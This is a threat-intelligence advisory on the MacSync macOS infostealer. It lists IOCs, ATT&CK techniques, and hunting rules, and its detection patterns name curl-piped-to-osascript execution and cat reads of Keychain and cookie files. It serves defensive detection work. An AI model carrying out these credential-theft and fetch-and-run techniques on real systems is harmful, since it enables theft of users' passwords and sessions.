BLUF

A newly uncovered macOS infostealer, MacSync, bypasses Apple's Gatekeeper security warnings using code-signed and notarized Swift applications.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

For organizations impacted by the MacSync macOS infostealer campaign or suspected abuse of notarized applications:

• Low-end total cost: $750,000 – $1.1M
  (Rapid containment, limited credential reuse, minimal regulatory exposure)

• Typical expected range: $1.4M – $2.2M

• Upper-bound realistic scenarios: $2.8M – $4M
  (Widespread credential compromise, third-party access concerns, regulatory follow-on)

Key cost driver:

This activity is financially dangerous not because it causes immediate outages, but because it undermines trust in notarized software and endpoint identity. Costs are driven by credential assurance, access revalidation, and governance response once macOS trust controls are shown to be bypassed.

Targeted Sectors

·         High-value individuals

·         Enterprises

·         Cryptocurrency users

Countries

·         Global

Date of First Reported Activity

·         December 2025

Date of Last Activity Update

·         December 23, 2025

APT Names

·         BlueNoroff (Lazarus Group)

Cyber Criminal organizations names

·          Russian-speaking cybercriminals

IOCs

·         This is a malware-as-a-service campaign.

·         As a reminder IOCs tend to be dynamic.
Hunting for the heuristic activity is likely to reveal more accurate results

Network Indicators

(C2 and Distribution)

Attackers use fake installer domains and remote servers to host encoded second-stage scripts.

Distribution Domain

·         zkcall[.]net (often serving a fake "zk-Call" messenger installer).

Download URL

·         hxxps://zkcall[.]net/download.

Infrastructure Pattern

·         C2 servers typically receive data via automated Swift-built helper executables.

Host-Based Indicators

Malicious Filename

zk-call-messenger-installer-3.9.2-lts.dmg.

Apple Developer Team ID

GNJLS3UYZ4 (Note: This certificate was revoked in late December 2025 after reports to Apple).

Disk Image Characteristics

Unusually large DMGs (approx. 25.5 MB) inflated with decoy files like LibreOffice PDFs to evade simple automated scanning.

Execution Patterns and Behavior

Dropper Method

A notarized Swift application that silently retrieves an encoded script from a remote server.

Persistence/Backdoor

Features a Go-based agent that provides persistent backdoor access in addition to data exfiltration.

Environmental Checks

The malware checks for active internet connectivity and limits execution frequency to remain stealthy.

Memory Execution

Many MacSync payloads run primarily in memory, leaving minimal traces on the physical disk after the initial dropper execution.

TTPs

Initial Access

·         T1189 – Drive-by Compromise: Using malvertising and fake software landing pages to trick users into downloading malicious disk images.

·         T1566.002 – Phishing: Spearphishing Link: Directing high-value targets (often in the crypto or enterprise sectors) to "ordinary-looking" utility URLs.

·         T1204.002 – User Execution: Malicious File: Luring victims to open a .dmg file masquerading as a legitimate tool, such as a "zk-Call" messenger.

Execution

·         T1059.002 – Command and Scripting Interpreter: AppleScript: Used for initial dropper functions and to prompt users for sensitive information.

·         T1203 – Exploitation for Client Execution: In earlier versions, it utilized "ClickFix" or "drag-to-terminal" routines to bypass macOS protections.

·         T1106 – Native API: The 2025 version uses a Swift-based application that interacts directly with system APIs to fetch payloads silently.

Persistence

·         T1543.001 – Create or Modify System Process: Launch Agent: Establishing persistence by creating .plist files (e.g., com.finder.helper.plist) to ensure the malware runs upon login.

·         T1105 – Ingress Tool Transfer: Continuous use of a Go-based agent acting as a modular backdoor for persistent remote command and control.

Defense Evasion

·         T1553.002 – Subvert Trust Controls: Code Signing: Using legitimate Apple Developer certificates to sign and notarize the Swift app, allowing it to bypass macOS Gatekeeper without warnings.

·         T1027 – Obfuscated Files or Information: Inflating disk images (DMGs) with large decoy files (e.g., LibreOffice PDFs) to bypass size-limited automated sandbox scanners.

·         T1497.001 – Virtualization/Sandbox Evasion: System Checks: Checking for active internet connectivity and limiting execution frequency to evade detection by security researchers.

Credential Access

·         T1555.001 – Credentials from Password Stores: Keychain: Specifically targeting the macOS Keychain to extract saved passwords and certificates.

·         T1539 – Steal Web Session Cookie: Harvesting cookies and login data from browsers to bypass multi-factor authentication (MFA).

Command and Control (C2)

·         T1071.001 – Application Layer Protocol: Web Protocols: Utilizing the native Go net/http library for HTTPS communication, which evades standard "curl-hunting" detection rules.

·         T1568 – Dynamic Resolution: Employing rotating infrastructure and URLs to serve as redirectors, making it harder to block via static IP or domain blacklists

Malware Names

·         MacSync Stealer

Sample data information

Installer (DMG)

sha256

b591bfbab57cc69ce985fbc426002ef00826605257de0547f20ebcfecc3724c2

(Filename: zk-call-messenger-installer-3.9.2-lts.dmg)

URL link to sample

·         hxxps://www.virustotal.com/gui/file/b591bfbab57cc69ce985fbc426002ef00826605257de0547f20ebcfecc3724c2

Installer (DMG)

sha256

be961ec5b9f4cc501ed5d5b8974b730dabcdf7e279ed4a8c037c67b5b935d51a

(Filename: zk-call-messenger-installer-3.9.2-lts.dmg)

URL link to sample

·         hxxps://www.virustotal.com/gui/file/be961ec5b9f4cc501ed5d5b8974b730dabcdf7e279ed4a8c037c67b5b935d51a

Malicious Binary (Mach-O)

sha256

173ff5ede7c28163ceaa9440de8a02cef26295f8be06b6b0f90b0a4284471bc2

(Filename: devupdatesuite-helper)

URL link to sample

·         hxxps://www.virustotal.com/gui/file/173ff5ede7c28163ceaa9440de8a02cef26295f8be06b6b0f90b0a4284471bc2

Helper Component (Mach-O)

Sha256

ecfaa20f25e11878686249c7094706bc3dcd2dc0ace0f2932a39d1bfdac85863

Filename: runtimectl

URL to sample

·         hxxps://www.virustotal.com/gui/file/ecfaa20f25e11878686249c7094706bc3dcd2dc0ace0f2932a39d1bfdac85863

CVEs & CVSS

·         Bypasses security features without a specific CVE; exploits user trust in notarized apps.

Suggested rules  potential hunts

Suricata

Network Detection

Rule for Suspicious Payload Retrieval:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"MALWARE MacSync Stealer - Initial Payload Download (curl)"; flow:established,to_server; http.user_agent; content:"Mac OS X 10_15_7"; depth:16; http.method; content:"GET"; classtype:trojan-activity; sid:2025002; rev:1;)

Rule for Exfiltration of Keychain/Cookies

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"MALWARE MacSync Stealer - Keychain/Cookie Exfiltration Attempt"; flow:established,to_server; http.method; content:"POST"; http.content_type; content:"application/octet-stream"; classtype:trojan-activity; sid:2025003; rev:1;)

SentinelOne

Endpoint Hunting

Hunt for Signed Dropper Execution

ProcessName = "zk-Call" OR (DeveloperID = "GNJLS3UYZ4" AND NOT (SignedStatus = "Revoked")) (Note: Certificate was revoked late Dec 2025, but may still appear in historical logs)

Hunt for AppleScript Injection

ObjectType = "Process" AND (CmdLine CONTAINS "curl" AND CmdLine CONTAINS "| osascript")

Hunt for Sensitive Data Access

ObjectType = "File" AND (FilePath CONTAINS "Library/Keychains" OR FilePath CONTAINS "Cookies.binarycookies") AND ProcessName = "cat"

Splunk

Detect "Fetch-and-Pipe" Activity

index=macos sourcetype="osquery:results" name="process_events" cmdline="*curl*|*osascript*" | table _time, host, user, cmdline

Identify Inflated DMG Installations

index=macos sourcetype="osquery:results" name="disk_images" | where size > 25000000 AND (file_name LIKE "%.dmg" OR file_name LIKE "%.pkg") | search "PDF" (Hunts for 25.5MB+ installers inflated with decoy PDFs)

Monitor for Unauthorized Keychain Collection

index=macos sourcetype="syslog" "cat" AND ("login.keychain" OR "Cookies") | stats count by host, user, cmdline

Delivery Method

Malicious disk images (DMG) containing decoy content and a legitimate-looking notarized app.

References

CSO Online

·         hxxps://www.csoonline.com/article/4111179/macsync-stealer-malware-bypasses-macos-gatekeeper-security-warnings.html

SC Media

hxxps://www.scworld.com/brief/updated-delivery-method-employed-by-macsync-malware

JamF

hxxps://www.jamf.com/blog/macsync-stealer-evolution-code-signed-swift-malware-analysis

AppleInsider

hxxps://appleinsider.com/articles/25/12/23/malware-bypassed-macos-gatekeeper-by-abusing-apples-notarization-proccess

InfoSecurity Magazine

hxxps://www.infosecurity-magazine.com/news/signed-variant-macsync-stealer

Reddit

hxxps://www.reddit.com/r/apple/comments/1ptr7uo/new_macsync_malware_dropper_evades_macos

The Hacker News

hxxps://thehackernews.com/2025/12/new-macsync-macos-stealer-uses-signed.html

Malware Traffic Analysis

hxxps://www.malware-traffic-analysis.net/2025/12/23/index.html

VirusTotal

·         hxxps://www.virustotal.com/gui/file/b591bfbab57cc69ce985fbc426002ef00826605257de0547f20ebcfecc3724c2

·         hxxps://www.virustotal.com/gui/file/173ff5ede7c28163ceaa9440de8a02cef26295f8be06b6b0f90b0a4284471bc2

·         hxxps://www.virustotal.com/gui/file/ecfaa20f25e11878686249c7094706bc3dcd2dc0ace0f2932a39d1bfdac85863